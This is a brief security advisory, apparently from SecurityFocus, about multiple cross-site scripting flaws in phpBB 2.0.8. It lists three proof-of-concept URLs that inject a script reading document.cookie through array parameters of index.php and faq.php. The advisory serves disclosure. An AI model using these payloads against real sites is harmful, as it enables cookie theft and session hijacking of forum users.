PHPBB Multiple Cross-Site Scripting Vulnerabilities

The following examples are available:
http://www.example.com/phpbb208/index.php?category_rows[0][cat_id]=1&category_rows[0][cat_title]=waraxe<script>alert(document.cookie);</script>&category_rows[0][cat_order]=99

http://www.example.com/phpbb208/faq.php?faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe

http://www.example.com/phpbb208/faq.php?mode=bbcode&faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=waraxe


 

Privacy Statement
Copyright 2010, SecurityFocus